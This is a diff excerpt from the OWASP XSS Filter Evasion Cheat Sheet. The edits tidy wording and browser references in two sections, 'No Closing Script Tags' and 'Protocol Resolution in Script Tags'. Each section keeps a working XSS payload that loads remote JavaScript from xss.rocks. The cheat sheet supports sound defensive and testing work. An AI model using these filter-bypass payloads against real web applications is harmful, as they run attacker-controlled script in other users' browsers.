OWASP/CheatSheetSeries/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.md

 ### No Closing Script Tags

-In the Gecko rendering engine mode for Firefox and Netscape 8.1, you don't actually need the `\></SCRIPT>` portion of this XSS vector, because Firefox assumes it's safe to close the HTML tag and add closing tags for you.
-How thoughtful\!
-Unlike the next attack, which doesn't effect Firefox, this method does not require any additional HTML below it.
-You can add quotes if you need to, but they're normally not needed (although beware, I have no idea what the HTML will end up looking like once this is injected):
+With Firefox, you don't actually need the `\></SCRIPT>` portion of this XSS vector, because Firefox assumes it's safe to close the HTML tag and adds closing tags for you.
+Unlike the next attack, which doesn't affect Firefox, this method does not require any additional HTML below it.
+You can add quotes if you need to, but they're normally not needed:

 `<SCRIPT SRC=http://xss.rocks/xss.js?< B >`

 ### Protocol Resolution in Script Tags

-This particular variant is partiallybased on Ozh's protocol resolution bypass below, and it works in IE, Netscape in IE rendering mode and Opera if you add in a `</SCRIPT>` tag at the end.
+This particular variant is partially based on Ozh's protocol resolution bypass below, and it works in IE and Edge in compatibility mode.
 However, this is especially useful where space is an issue, and of course, the shorter your domain, the better.
-The ".j" is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.
+The `.j` is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.

 `<SCRIPT SRC=//xss.rocks/.j>`